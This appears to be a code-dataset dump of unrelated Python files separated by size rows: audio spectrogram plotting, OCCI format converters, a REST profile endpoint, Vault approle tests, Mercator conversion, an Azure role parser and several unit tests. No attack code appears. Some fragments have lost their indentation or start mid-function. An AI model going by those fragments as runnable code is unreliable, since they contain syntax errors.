        if title:
            ax.set_title(title, fontdict={"family": default_font})

    logger.info(f"Plot TF-mask of utterance {key} to {dest}.{default_fmt}...")
    if mat.ndim == 3:
        # Multi-channel input: one stacked subplot per channel.
        N, T, F = mat.shape
    else:
        T, F = mat.shape
        N = 1
    fig, ax = plt.subplots(nrows=N)
    if N != 1:
        ts = title.split(";")
        for i in range(N):
            # Only the bottom subplot carries the time-axis tick labels.
            if len(ts) == N:
                sub_plot(ax[i], mat[i], T, F, xticks=i == N - 1, title=ts[i])
            else:
                sub_plot(ax[i], mat[i], T, F, xticks=i == N - 1)
    else:
        sub_plot(ax, mat, T, F, title=title)
    fig.savefig(f"{dest}.{default_fmt}", dpi=default_dpi, format=default_fmt)
    # Close explicitly so batch plotting does not accumulate open figures.
    plt.close(fig)
def run(args):
    """Render one spectrogram image per utterance in args.wav_scp into
    args.cache_dir."""
    out_dir = Path(args.cache_dir)
    out_dir.mkdir(parents=True, exist_ok=True)
    stft_kwargs = dict(
        frame_len=args.frame_len,
        frame_hop=args.frame_hop,
        round_power_of_two=args.round_power_of_two,
        window=args.window,
        center=args.center,  # false to comparable with kaldi
    )
    reader = SpectrogramReader(args.wav_scp,
                               **stft_kwargs,
                               apply_abs=True,
                               apply_log=True,
                               transpose=True)
    for key, mat in reader:
        # Multi-channel input: keep only the requested channel when asked.
        if mat.ndim == 3 and args.index >= 0:
            mat = mat[args.index]
        dest = out_dir / key.replace(".", "-")
        save_figure(key,
                    mat,
                    dest,
                    cmap=args.cmap,
                    hop=args.frame_hop,
                    sr=args.sr,
                    title=args.title)
if __name__ == "__main__":
    # CLI entry point; STFT-related options are inherited from StftParser.
    parser = argparse.ArgumentParser(
        description="Command to visualize audio spectrogram.",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        parents=[StftParser.parser])
    parser.add_argument("wav_scp", type=str, help="Read specifier of audio")
    parser.add_argument("--sr",
                        type=int,
                        default=16000,
                        help="Sample frequency (Hz)")
    parser.add_argument("--cache-dir",
                        type=str,
                        default="spectrogram",
                        help="Directory to dump spectrograms")
    parser.add_argument("--cmap",
                        choices=["binary", "jet", "hot"],
                        default="jet",
                        help="Colormap used when save figures")
    parser.add_argument("--index",
                        type=int,
                        default=-1,
                        help="Channel index to plot, -1 means all")
    parser.add_argument("--title",
                        type=str,
                        default="",
                        help="Title of the pictures")
    args = parser.parse_args()
    run(args)
| 4,291 | 1,364 |
# Copyright 2010-2012 Institut Mines-Telecom
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Jun 21, 2012
@author: Bilel Msekni
@contact: bilel.msekni@telecom-sudparis.eu
@author: Houssem Medhioub
@contact: houssem.medhioub@it-sudparis.eu
@organization: Institut Mines-Telecom - Telecom SudParis
@license: Apache License, Version 2.0
"""
try:
import simplejson as json
except ImportError:
import json
import pyocni.adapters.cnv_toHTTP as extractor
from webob import Response
class To_HTTP_Text_Plain():
    """
    Converts Response data from application/occi+json object to HTTP text/plain descriptions
    """

    def format_to_text_plain_categories(self, var):
        """
        Format JSON categories into HTTP text/plain categories

        Args:
            @param var: JSON categories
        """
        resp = ""
        # FIX: dict.has_key() was removed in Python 3; the `in` operator is
        # the equivalent, portable spelling (used throughout this class).
        if 'kinds' in var:
            items = var['kinds']
            for item in items:
                resp += "Category :" + cnv_JSON_category(item, "kind") + "\n"
        if 'mixins' in var:
            items = var['mixins']
            for item in items:
                resp += "Category :" + cnv_JSON_category(item, "mixin") + "\n"
        if 'actions' in var:
            items = var['actions']
            for item in items:
                resp += "Category :" + cnv_JSON_category(item, "action") + "\n"
        return resp

    def format_to_text_plain_entities(self, var):
        """
        Convert a JSON resource description into a text/plain resource description

        Args:
            @param var: JSON resource description
        """
        response = ""
        if 'resources' in var:
            items = var['resources']
            for item in items:
                cat, link, att = cnv_JSON_Resource(item)
                for c in cat:
                    response += "Category: " + c + "\n"
                for l in link:
                    response += "Link: " + l + "\n"
                for a in att:
                    response += "X-OCCI-Attribute: " + a + "\n"
                # Replace the trailing newline with a resource separator.
                response = response[:-1] + ",\n"
            # Drop the separator after the last resource.
            response = response[:-2]
        if 'links' in var:
            items = var['links']
            response += ",\n"
            for item in items:
                cat, link, att = cnv_JSON_Resource(item)
                for c in cat:
                    response += "Category: " + c + "\n"
                for l in link:
                    response += "Link: " + l + "\n"
                for a in att:
                    response += "X-OCCI-Attribute: " + a + "\n"
                response = response[:-1] + ",\n"
            response = response[:-2]
        return response

    def format_to_text_plain_locations(self, var):
        """
        Converts JSON locations into HTTP locations

        Args:
            var: JSON locations
        """
        locs = ""
        for item in var:
            locs += "Location: " + item + "\n"
        return locs

    def format_to_text_plain_x_locations(self, var):
        """
        Converts JSON locations into HTTP locations

        Args:
            var: JSON locations
        """
        locs = ""
        for item in var:
            locs += "X-OCCI-Location: " + item + "\n"
        return locs
class To_HTTP_Text_OCCI():
    """
    Converts Response data from application/occi+json object to HTTP text/occi descriptions
    """

    def format_to_text_occi_categories(self, var):
        """
        Format JSON categories into HTTP text/plain categories

        Args:
            @param var: JSON categories
        """
        resp = Response()
        resp.headers.clear()
        value = ""
        # FIX: dict.has_key() was removed in Python 3; the `in` operator is
        # the equivalent, portable spelling (used throughout this class).
        if 'kinds' in var:
            items = var['kinds']
            for item in items:
                value = cnv_JSON_category(item, "kind") + ",\n"
                # Strip the trailing ",\n" before adding the header.
                resp.headers.add('Category', value[:-2])
        if 'mixins' in var:
            items = var['mixins']
            for item in items:
                value = cnv_JSON_category(item, "mixin") + ",\n"
                resp.headers.add('Category', value[:-2])
        if 'actions' in var:
            items = var['actions']
            for item in items:
                value = cnv_JSON_category(item, "action") + ",\n"
                resp.headers.add('Category', value[:-2])
        return resp.headers

    def format_to_text_occi_entities(self, var):
        """
        Convert a JSON resource description into a text/occi resource description

        Args:
            @param var: JSON resource description
        """
        response = Response()
        response.headers.clear()
        if 'resources' in var:
            items = var['resources']
            for item in items:
                cat, link, att = cnv_JSON_Resource(item)
                for c in cat:
                    response.headers.add("Category", c)
                for l in link:
                    response.headers.add("Link", l)
                for a in att:
                    response.headers.add("X-OCCI-Attribute", a)
        if 'links' in var:
            items = var['links']
            for item in items:
                cat, link, att = cnv_JSON_Resource(item)
                for c in cat:
                    response.headers.add("Category", c)
                for l in link:
                    response.headers.add("Link", l)
                for a in att:
                    response.headers.add("X-OCCI-Attribute", a)
        return response.headers

    def format_to_text_occi_locations(self, var):
        """
        Converts JSON locations into HTTP locations

        Args:
            var: JSON locations
        """
        locs = ""
        resp = Response()
        resp.headers.clear()
        # Join all locations into a single comma-separated header value.
        for item in var:
            locs += item + ","
        resp.headers.add("Location", locs[:-1])
        return resp.headers

    def format_to_text_x_occi_locations(self, var):
        """
        Converts JSON locations into HTTP locations

        Args:
            var: JSON locations
        """
        locs = ""
        resp = Response()
        resp.headers.clear()
        for item in var:
            locs += item + ","
        resp.headers.add("X-OCCI-Location", locs[:-1])
        return resp.headers
class To_HTTP_Text_URI_List():
    """
    Converts Response data from application/occi+json object to HTTP text/uri descriptions
    """

    def __init__(self):
        pass

    def check_for_uri_locations(self, var):
        """
        Checks for the existence of path URIs in a JSON location object

        Args:
            @param var: JSON location object

        Returns a (newline-terminated URI listing, True) pair.
        """
        listing = "".join(uri + "\n" for uri in var)
        return listing, True
def cnv_JSON_category(category, type):
    """
    Converts a json category into a HTTP category

    Args:
        @param category: JSON category
        @param type: Category type = (kind || mixin || action)
    """
    # Mandatory leading segments: term, scheme and class.
    segments = [
        extractor.extract_term_from_category(category) + ";",
        "scheme=\"" + extractor.extract_scheme_from_category(category) + "\";",
        "class=\"" + type + "\";",
    ]
    # Optional rendering attributes, emitted only when present, in the
    # canonical order.
    optional_fields = (
        ("title", extractor.extract_title_from_category(category)),
        ("rel", extractor.extract_related_from_category(category)),
        ("attributes", extractor.extract_attributes_from_category(category)),
        ("actions", extractor.extract_actions_from_category(category)),
        ("location", extractor.extract_location_from_category(category)),
    )
    for field_name, field_value in optional_fields:
        if field_value is not None:
            segments.append(field_name + "=\"" + field_value + "\";")
    return "".join(segments)
def cnv_JSON_Resource(json_object):
    """
    Converts a JSON Resource into a HTTP Resource

    Returns (categories, links, attributes) string lists.
    """
    # The kind always contributes the first category; mixins follow.
    categories = [extractor.extract_kind_from_entity(json_object)]
    mixins = extractor.extract_mixin_from_entity(json_object)
    if mixins is not None:
        categories.extend(mixins)
    attributes = extractor.extract_attributes_from_entity(json_object)
    if attributes is None:
        attributes = list()
    # Internal links first, then action links, as in the original layout.
    links = list()
    for chunk in (extractor.extract_internal_link_from_entity(json_object),
                  extractor.extract_actions_from_entity(json_object)):
        if chunk is not None:
            links.extend(chunk)
    return categories, links, attributes
| 9,246 | 2,705 |
from typing import Any, Optional
from restapi import decorators
from restapi.endpoints.schemas import NewPassword, profile_output, profile_patch_input
from restapi.exceptions import Unauthorized
from restapi.rest.definition import EndpointResource, Response
from restapi.services.authentication import AuthMissingTOTP, User
from restapi.utilities.globals import mem
from restapi.utilities.logs import log
class Profile(EndpointResource):
    """Endpoints for the authenticated user to read and modify their own profile."""

    depends_on = ["MAIN_LOGIN_ENABLE", "AUTH_ENABLE"]
    labels = ["profile"]

    @decorators.auth.require()
    @decorators.marshal_with(profile_output(), code=200)
    @decorators.endpoint(
        path="/auth/profile",
        summary="List profile attributes",
        responses={200: "User profile is returned"},
    )
    def get(self, user: User) -> Response:
        """Return the current user's profile attributes."""
        data = {
            "uuid": user.uuid,
            "email": user.email,
            "name": user.name,
            "surname": user.surname,
            "isAdmin": self.auth.is_admin(user),
            "isStaff": self.auth.is_staff(user),
            "isCoordinator": self.auth.is_coordinator(user),
            "privacy_accepted": user.privacy_accepted,
            "last_password_change": user.last_password_change,
            "first_login": user.first_login,
            "last_login": user.last_login,
            "is_active": user.is_active,
            "expiration": user.expiration,
            "belongs_to": user.belongs_to,
            # Convert list of Roles into a dict with name: description
            "roles": {role.name: role.description for role in user.roles},
            "two_factor_enabled": self.auth.SECOND_FACTOR_AUTHENTICATION,
        }

        # Hook allowing project-level customization of the payload.
        data = mem.customizer.manipulate_profile(ref=self, user=user, data=data)

        return self.response(data)

    @decorators.auth.require()
    @decorators.use_kwargs(NewPassword)
    @decorators.endpoint(
        path="/auth/profile",
        summary="Update user password",
        responses={204: "Password updated"},
    )
    def put(
        self,
        password: str,
        new_password: str,
        password_confirm: str,
        user: User,
        totp_code: Optional[str] = None,
    ) -> Response:
        """Change the current user's password after re-verifying credentials."""
        try:
            self.auth.make_login(user.email, password, totp_code)
        except AuthMissingTOTP:
            raise Unauthorized("Verification code is missing")

        self.auth.change_password(user, password, new_password, password_confirm)
        self.auth.save_user(user)

        return self.empty_response()

    @decorators.auth.require()
    @decorators.use_kwargs(profile_patch_input())
    @decorators.endpoint(
        path="/auth/profile",
        summary="Update profile information",
        responses={204: "Profile updated"},
    )
    def patch(self, user: User, **kwargs: Any) -> Response:
        """Update profile for current user"""
        # mypy correctly raises errors because update_properties is not defined
        # in generic Connector instances, but in this case this is an instance
        # of an auth db and their implementation always contains this method
        self.auth.db.update_properties(user, kwargs)  # type: ignore

        log.info("Profile updated")

        self.auth.save_user(user)

        self.log_event(self.events.modify, user, kwargs)

        return self.empty_response()
| 3,352 | 964 |
# Exercises PEP 572 assignment-expression ("walrus") scoping: a walrus
# target inside a comprehension binds in the scope *containing* the
# comprehension, while the comprehension's own loop variable never leaks.

comp1 = [x1 := x * x for x in range(10)]
print(comp1)
print(x1)  # bound at module scope by the walrus (last value, 81)
print(globals().get('x'))  # the loop variable does not leak -> None

def f2():
    # Walrus target becomes a local of f2.
    comp2 = [x2 := x ** 3 for x in range(9)]
    print(comp2)
    print(x2)
    print(locals().get('x'))  # comprehension's x stays internal -> None

def f3():
    global x3
    # With a `global` declaration the walrus writes to module scope.
    comp3 = [x3 := x ** 4 for x in range(8)]
    print(comp3)
    print(locals().get('x'))

def f4():
    x4 = 0
    def g4():
        nonlocal x4
        # With `nonlocal` the walrus rebinds f4's variable.
        comp4 = [x4 := x ** 5 for x in range(7)]
        print(comp4)
        print(locals().get('x'))
    g4()
    print(x4)

def f5():
    # Even inside a *nested* comprehension the walrus binds in f5 itself.
    comp5 = [[x5 := i for i in range(3)] for j in range(2)]
    print(comp5)
    print(x5)
    print(locals().get('i'))
    print(locals().get('j'))

f2()
print(globals().get('x'))
print(globals().get('x2'))  # f2's x2 was local -> None
f3()
print(globals().get('x'))
print(globals().get('x3'))  # made global inside f3
f4()
print(globals().get('x'))
print(globals().get('x4'))  # f4's x4 stayed function-local -> None
f5()
print(globals().get('i'))
print(globals().get('j'))
print(globals().get('x5'))  # f5's x5 was local -> None
| 928 | 399 |
# -*- coding: utf-8 -*-
# Copyright (c) 2021 Brian Scholer (@briantist)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import pytest
from ansible_collections.community.hashi_vault.tests.unit.compat import mock
from ansible_collections.community.hashi_vault.plugins.module_utils._auth_method_approle import (
HashiVaultAuthMethodApprole,
)
from ansible_collections.community.hashi_vault.plugins.module_utils._hashi_vault_common import (
HashiVaultAuthMethodBase,
HashiVaultValueError,
)
@pytest.fixture
def option_dict():
    """Baseline approle auth options as seen through the options adapter."""
    return {
        'auth_method': 'approle',
        'secret_id': None,
        'role_id': None,
        'mount_point': None,
    }

@pytest.fixture
def secret_id():
    """An arbitrary approle secret-id value."""
    return 'opaque'

@pytest.fixture
def role_id():
    """An arbitrary approle role-id value."""
    return 'fake-role'

@pytest.fixture
def auth_approle(adapter, warner):
    """Auth-method object under test, wired to the shared adapter/warner fixtures."""
    return HashiVaultAuthMethodApprole(adapter, warner)

@pytest.fixture
def approle_login_response(fixture_loader):
    """Canned Vault approle login response loaded from the JSON fixture."""
    return fixture_loader('approle_login_response.json')
class TestAuthApprole(object):
    """Unit tests for the approle auth-method helper."""

    def test_auth_approle_is_auth_method_base(self, auth_approle):
        # Sanity: the approle method plugs into the common auth-method base.
        assert isinstance(auth_approle, HashiVaultAuthMethodApprole)
        assert issubclass(HashiVaultAuthMethodApprole, HashiVaultAuthMethodBase)

    def test_auth_approle_validate_direct(self, auth_approle, adapter, role_id):
        # role_id alone is enough to satisfy validation.
        adapter.set_option('role_id', role_id)
        auth_approle.validate()

    @pytest.mark.parametrize('opt_patch', [
        {},
        {'secret_id': 'secret_id-only'},
    ])
    def test_auth_approle_validate_xfailures(self, auth_approle, adapter, opt_patch):
        # Missing role_id must fail validation, with or without secret_id.
        adapter.set_options(**opt_patch)

        with pytest.raises(HashiVaultValueError, match=r'Authentication method approle requires options .*? to be set, but these are missing:'):
            auth_approle.validate()

    @pytest.mark.parametrize('use_token', [True, False], ids=lambda x: 'use_token=%s' % x)
    @pytest.mark.parametrize('mount_point', [None, 'other'], ids=lambda x: 'mount_point=%s' % x)
    def test_auth_approle_authenticate(self, auth_approle, client, adapter, secret_id, role_id, mount_point, use_token, approle_login_response):
        """authenticate() forwards options to the client login and honors use_token."""
        adapter.set_option('secret_id', secret_id)
        adapter.set_option('role_id', role_id)
        adapter.set_option('mount_point', mount_point)

        expected_login_params = {
            'secret_id': secret_id,
            'role_id': role_id,
            'use_token': use_token,
        }
        # mount_point is only forwarded when explicitly configured.
        if mount_point:
            expected_login_params['mount_point'] = mount_point

        def _set_client_token(*args, **kwargs):
            # Mimic the client: a use_token login stores the client token.
            if kwargs['use_token']:
                client.token = approle_login_response['auth']['client_token']
            return approle_login_response

        with mock.patch.object(client.auth.approle, 'login', side_effect=_set_client_token) as approle_login:
            response = auth_approle.authenticate(client, use_token=use_token)

        approle_login.assert_called_once_with(**expected_login_params)

        assert response['auth']['client_token'] == approle_login_response['auth']['client_token']
        # The client token is set if and only if use_token was requested.
        assert (client.token == approle_login_response['auth']['client_token']) is use_token
| 3,358 | 1,100 |
from distutils.core import setup, Extension
import glob
import os
# the c++ extension module
# NOTE(review): the glob collects *.c sources although the comment above says
# C++ -- confirm which is intended.
sources = glob.glob("*.c")
# Force the GCC toolchain for building the extension.
os.environ["CC"] = "gcc"
os.environ["CXX"] = "g++"
# Links against libsoundio and pthreads; both must be installed system-wide.
extension_mod = Extension("libamy", sources=sources, extra_link_args=["-lsoundio", "-lpthread"])

setup(name = "libamy",
      ext_modules=[extension_mod])
# -*- coding: utf-8 -*-
from sqlalchemy import Column
from sqlalchemy.dialects.mysql import INTEGER
from common.db import BaseModel
class JobKeywordModel(BaseModel):
    """Association table linking jobs to keywords, with a denormalized city id."""
    __tablename__ = 'job_keyword'

    id = Column(INTEGER, primary_key=True, autoincrement=True)
    job_id = Column(INTEGER, doc=u'工作 id')  # job id
    keyword_id = Column(INTEGER, doc=u'关键词 id')  # keyword id
    city_id = Column(INTEGER, doc=u'冗余:所在城市 id')  # denormalized: city id

    # NOTE: method name shadows the builtin `list`; kept for API compatibility.
    @classmethod
    def list(cls, job_id=None):
        """Return all associations, optionally filtered by job_id."""
        query = cls.session.query(cls)
        if job_id:
            query = query.filter(cls.job_id == job_id)
        return query.all()

    @classmethod
    def add(cls, job_id, keyword_id, city_id):
        """Merge one (job, keyword, city) association and commit immediately."""
        job_keyword = cls(job_id=int(job_id), keyword_id=int(keyword_id), city_id=int(city_id))
        # merge() performs an insert-or-update on the primary key.
        cls.session.merge(job_keyword)
        cls.session.commit()
| 826 | 318 |
#!/usr/bin/env python
# coding=utf-8
"""
Copyright (c) 2020 Baidu.com, Inc. All Rights Reserved
File: ll_2_mc.py
func: 墨卡托与经纬度间相互转换
Author: yuwei09(yuwei09@baidu.com)
Date: 2021/07/21
"""
import math
# Half the Earth's equatorial circumference in Web-Mercator metres (pi * R).
SCALE_S = 20037508.34

def lonLat2Mercator(x, y):
    """Convert longitude/latitude (degrees) to Web-Mercator coordinates (metres).

    BUG FIX: the original computed the Mercator y with the correct
    log-tangent formula and then immediately overwrote it with the linear
    scaling ``y * SCALE_S / 180.`` (a copy of the x branch). The projection
    applies that linear scaling *to the log-tangent value* instead.
    """
    mx = x * SCALE_S / 180.
    my = math.log(math.tan((90. + y) * math.pi / 360.)) / (math.pi / 180.)
    my = my * SCALE_S / 180.
    return mx, my
def Mercator2LonLat(x, y):
    """Convert a Web-Mercator point (metres) back to longitude/latitude (degrees)."""
    lx = x / SCALE_S * 180.
    # Undo the linear scaling, then invert the log-tangent latitude mapping
    # via 2*atan(exp(.)) - pi/2.
    scaled = y / SCALE_S * 180.
    ly = 180 / math.pi * (2 * math.atan(math.exp(scaled * math.pi / 180.)) - math.pi / 2)
    return lx, ly
if __name__ == '__main__':
    # Smoke test: convert one Mercator point back to longitude/latitude.
    x, y = 12962922.3800, 4832335.0200
    lx, ly = Mercator2LonLat(x, y)
    print(lx, ly)
    # lx, ly = bd09mc_to_bd09ll(x, y)
    # print(lx, ly)
| 905 | 487 |
import os
import json
import time
import requests
import re
result = {
    'roles': []
}

raw_roles = []
with open("azure/built-in-roles-raw.json", "r") as f:
    raw_roles = json.loads(f.read())

provider_ops = []
with open("azure/provider-operations.json", "r") as f:
    provider_ops = json.loads(f.read())


def _action_pattern(action):
    """Compile an Azure action wildcard expression into an anchored regex.

    '*' matches any run of characters; '?' matches exactly one character;
    '.' is a literal separator. Matching is case-insensitive via lowercasing
    on both sides.

    BUG FIX: the original translated '?' into '.{{1}}' -- the *str.format*
    escaped form -- which as a raw regex matches one character followed by a
    literal '{}' pair. '?' now correctly becomes '.' (any single character).
    Compiling once per action expression also avoids re-parsing the pattern
    for every operation scanned.
    """
    escaped = action.replace(".", "\\.").replace("*", ".*").replace("?", ".")
    return re.compile("^" + escaped.lower() + "$")


def _record(operation, provider):
    """Build the output record for one matched operation."""
    return {
        'name': operation['name'],
        'description': operation['description'],
        'displayName': operation['displayName'],
        'providerName': provider['name'],
        'providerDisplayName': provider['displayName']
    }


def _matching_operations(pattern, is_data_action):
    """Yield (operation, provider) pairs whose name matches `pattern`.

    For each provider, its top-level operations are scanned first, then the
    operations of each of its resource types -- the same order the original
    copy-pasted loops used.
    """
    for provider in provider_ops:
        for operation in provider['operations']:
            if bool(operation['isDataAction']) == is_data_action and pattern.search(operation['name'].lower()):
                yield operation, provider
        for resource_type in provider['resourceTypes']:
            for operation in resource_type['operations']:
                if bool(operation['isDataAction']) == is_data_action and pattern.search(operation['name'].lower()):
                    yield operation, provider


for raw_role in raw_roles:
    if raw_role['roleType'] != "BuiltInRole":
        continue
    permitted_actions = []
    permitted_data_actions = []
    has_unknown = False   # some action expression matched no known operation
    has_external = False  # some action expression targets a non-Microsoft provider

    # Expand the allow lists ('actions' then 'dataActions') into concrete
    # operation records.
    for key, is_data, bucket in (('actions', False, permitted_actions),
                                 ('dataActions', True, permitted_data_actions)):
        for permission in raw_role['permissions']:
            for action in permission[key]:
                pattern = _action_pattern(action)
                matched = False
                for operation, provider in _matching_operations(pattern, is_data):
                    bucket.append(_record(operation, provider))
                    matched = True
                if not action.lower().startswith("microsoft."):
                    has_external = True
                if not matched:
                    has_unknown = True

    # Apply the deny lists ('notActions' then 'notDataActions') by removing
    # every operation they match from the corresponding permitted list.
    for key, is_data in (('notActions', False), ('notDataActions', True)):
        for permission in raw_role['permissions']:
            for action in permission[key]:
                pattern = _action_pattern(action)
                denied_names = set()
                matched = False
                for operation, _provider in _matching_operations(pattern, is_data):
                    denied_names.add(operation['name'].lower())
                    matched = True
                if denied_names:
                    if is_data:
                        permitted_data_actions = [
                            a for a in permitted_data_actions
                            if a['name'].lower() not in denied_names]
                    else:
                        permitted_actions = [
                            a for a in permitted_actions
                            if a['name'].lower() not in denied_names]
                if not action.lower().startswith("microsoft."):
                    has_external = True
                if not matched:
                    has_unknown = True

    result['roles'].append({
        'name': raw_role['roleName'],
        'description': raw_role['description'],
        'permittedActions': permitted_actions,
        'permittedDataActions': permitted_data_actions,
        'rawPermissions': raw_role['permissions'],
        'hasUnknown': has_unknown,
        'hasExternal': has_external
    })

with open("azure/built-in-roles.json", "w") as f:
    f.write(json.dumps(result, indent=2, sort_keys=True))
| 7,028 | 1,590 |
# coding: utf-8
import datetime
import random
from unittest.mock import Mock
from django.db import reset_queries
import pytest
from src.domain.exchange_rate import CurrencyEntity, CurrencyExchangeRateEntity
from src.usecases.exchange_rate import CurrencyInteractor, CurrencyExchangeRateInteractor
from tests.fixtures import currency, exchange_rate
@pytest.mark.unit
def test_currency_interactor_get(currency):
    """CurrencyInteractor.get delegates to the repository and returns its entity."""
    repo = Mock()
    repo.get.return_value = currency
    interactor = CurrencyInteractor(repo)

    result = interactor.get(currency.code)

    assert repo.get.called
    assert result.code == currency.code
    assert result.name == currency.name
    assert result.symbol == currency.symbol
    assert CurrencyEntity.to_string(result) == CurrencyEntity.to_string(currency)
@pytest.mark.unit
def test_currency_interactor_get_availables(currency):
    """get_availables returns the full list provided by the repository."""
    expected_count = random.randint(1, 10)
    repo = Mock()
    repo.get_availables.return_value = [currency] * expected_count
    interactor = CurrencyInteractor(repo)

    result = interactor.get_availables()

    assert repo.get_availables.called
    assert isinstance(result, list)
    assert len(result) == expected_count
    assert all(isinstance(item, CurrencyEntity) for item in result)
@pytest.mark.unit
def test_currency_interactor_save(currency):
    """save forwards the entity to the repository and returns None."""
    repo = Mock()
    repo.save.return_value = None
    interactor = CurrencyInteractor(repo)

    assert interactor.save(currency) is None
    assert repo.save.called
@pytest.mark.unit
def test_currency_interactor_bulk_save(currency):
    """bulk_save forwards the entity list to the repository and returns None."""
    batch = [currency] * random.randint(1, 10)
    repo = Mock()
    repo.bulk_save.return_value = None
    interactor = CurrencyInteractor(repo)

    assert interactor.bulk_save(batch) is None
    assert repo.bulk_save.called
@pytest.mark.unit
def test_currency_exchange_rate_interactor_get(exchange_rate):
    """get passes the filter criteria through to the repo and returns the entity."""
    repo = Mock()
    repo.get.return_value = exchange_rate
    interactor = CurrencyExchangeRateInteractor(repo)
    criteria = {
        'source_currency': exchange_rate.source_currency,
        'exchanged_currency': exchange_rate.exchanged_currency,
        'valuation_date': exchange_rate.valuation_date
    }

    result = interactor.get(**criteria)

    assert repo.get.called
    assert result.source_currency == exchange_rate.source_currency
    assert result.exchanged_currency == exchange_rate.exchanged_currency
    assert result.valuation_date == exchange_rate.valuation_date
    assert result.rate_value == exchange_rate.rate_value
    assert CurrencyExchangeRateEntity.to_string(
        result) == CurrencyExchangeRateEntity.to_string(exchange_rate)
@pytest.mark.unit
def test_currency_exchange_rate_interactor_get_latest(exchange_rate):
    """get_latest queries the repo and yields today's rate for the pair."""
    repo = Mock()
    repo.get.return_value = exchange_rate
    interactor = CurrencyExchangeRateInteractor(repo)
    criteria = {
        'source_currency': exchange_rate.source_currency,
        'exchanged_currency': exchange_rate.exchanged_currency
    }

    result = interactor.get_latest(**criteria)

    assert repo.get.called
    assert result.source_currency == exchange_rate.source_currency
    assert result.exchanged_currency == exchange_rate.exchanged_currency
    assert result.valuation_date == datetime.date.today().strftime('%Y-%m-%d')
    assert result.rate_value == exchange_rate.rate_value
    assert CurrencyExchangeRateEntity.to_string(
        result) == CurrencyExchangeRateEntity.to_string(exchange_rate)
@pytest.mark.unit
def test_currency_exchange_rate_interactor_get_rate_series(exchange_rate):
    """get_rate_series returns the repo's list of float rates unchanged."""
    series_length = random.randint(1, 10)
    rates = [round(random.uniform(0.8, 1.2), 6) for _ in range(series_length)]
    repo = Mock()
    repo.get_rate_series.return_value = rates
    interactor = CurrencyExchangeRateInteractor(repo)
    criteria = {
        'source_currency': exchange_rate.source_currency,
        'exchanged_currency': exchange_rate.exchanged_currency,
        'date_from': datetime.date.today() + datetime.timedelta(days=-series_length),
        'date_to': datetime.date.today()
    }

    result = interactor.get_rate_series(**criteria)

    assert repo.get_rate_series.called
    assert isinstance(result, list)
    assert len(result) == series_length
    assert all(isinstance(rate, float) for rate in result)
@pytest.mark.unit
def test_currency_exchange_rate_interactor_get_time_series(exchange_rate):
    """get_time_series returns the repo's list of rate entities unchanged."""
    series_length = random.randint(1, 10)
    repo = Mock()
    repo.get_time_series.return_value = [exchange_rate] * series_length
    interactor = CurrencyExchangeRateInteractor(repo)
    criteria = {
        'source_currency': exchange_rate.source_currency,
        'exchanged_currency': exchange_rate.exchanged_currency,
        'date_from': datetime.date.today() + datetime.timedelta(days=-series_length),
        'date_to': datetime.date.today()
    }

    result = interactor.get_time_series(**criteria)

    assert repo.get_time_series.called
    assert isinstance(result, list)
    assert len(result) == series_length
    assert all(isinstance(cer, CurrencyExchangeRateEntity) for cer in result)
@pytest.mark.unit
def test_currency_exchange_rate_interactor_save(exchange_rate):
    """save forwards the rate entity to the repository and returns None."""
    repo = Mock()
    repo.save.return_value = None
    interactor = CurrencyExchangeRateInteractor(repo)

    assert interactor.save(exchange_rate) is None
    assert repo.save.called
@pytest.mark.unit
def test_currency_exchange_rate_interactor_bulk_save(exchange_rate):
    """bulk_save forwards the list of rate entities and returns None."""
    batch = [exchange_rate] * random.randint(1, 10)
    repo = Mock()
    repo.bulk_save.return_value = None
    interactor = CurrencyExchangeRateInteractor(repo)

    assert interactor.bulk_save(batch) is None
    assert repo.bulk_save.called
| 6,656 | 2,006 |
""" This module tests the io subpackage implementation.
Author: Nils Geib, nils.geib@uni-jena.de
"""
import numpy as np
from pypret import io
from pprint import pformat
from os import remove
class IO1(io.IO):
    """Minimal IO subclass used to exercise round-tripping of custom objects."""

    x = 1  # class-level value stored and compared through __repr__

    def squared(self):
        """Return x squared."""
        return self.x * self.x

    def __repr__(self):
        return "IO1(x={0})".format(self.x)
class Grid(io.IO):
    """Equidistant 1D grid whose axis is rebuilt from the stored scalars."""

    # only these attributes are persisted; self.x is derived in _post_init
    _io_store = ['N', 'dx', 'x0']

    def __init__(self, N, dx, x0=0.0):
        # This is _not_ called when the object is restored from storage
        self.N = N
        self.dx = dx
        self.x0 = x0
        self._post_init()

    def _post_init(self):
        # Called upon loading from storage: recompute the grid axis.
        indices = np.arange(self.N)
        self.x = self.x0 + indices * self.dx

    def __repr__(self):
        return "TestIO1(N={0}, dx={1}, x0={2})".format(
            self.N, self.dx, self.x0)
def test_io():
    """Round-trip a variety of objects through HDF5 storage."""
    # flat numeric arrays (real and complex)
    _assert_io(np.arange(5))
    _assert_io(np.arange(5, dtype=np.complex128))
    # nested heterogeneous containers of various types
    _assert_io([{'a': 1.0, 'b': np.uint16(1)}, np.random.rand(10),
                True, None, "hello", 1231241512354134123412353124, b"bytes"])
    _assert_io([[[1]], [[[[1], 2], 3], 4], 5])
    # custom IO subclasses
    _assert_io(IO1())
    _assert_io(Grid(128, 0.23, x0=-2.3))
def _assert_io(x):
    """Save *x* to HDF5, reload it, and compare pprint representations.

    Slightly hacky: pprint prints the objects recursively and the resulting
    strings are compared.  This only works because pprint sorts dictionary
    entries by key before printing, and it requires custom objects to
    implement __repr__.
    """
    io.save(x, "test.hdf5")
    reloaded = io.load("test.hdf5")
    remove("test.hdf5")
    original_repr = pformat(x)
    reloaded_repr = pformat(reloaded)
    if original_repr != reloaded_repr:
        print(original_repr)
        print(reloaded_repr)
        assert False
if __name__ == "__main__":
    # Allow running this test module directly, without a test runner.
    test_io()
| 1,978 | 778 |
from utils import *
from shared import *
from updating import MyAppContext
from threading import Thread
import re
import sys
import os
class BooksPage(Page, FilterableList):
    '''Lists books from Gen->Rev and connects to next chapters page.
    First page of application.'''

    def __init__(self):
        Page.__init__(self)
        FilterableList.__init__(self)
        self.set_items(BOOK_NAMES)
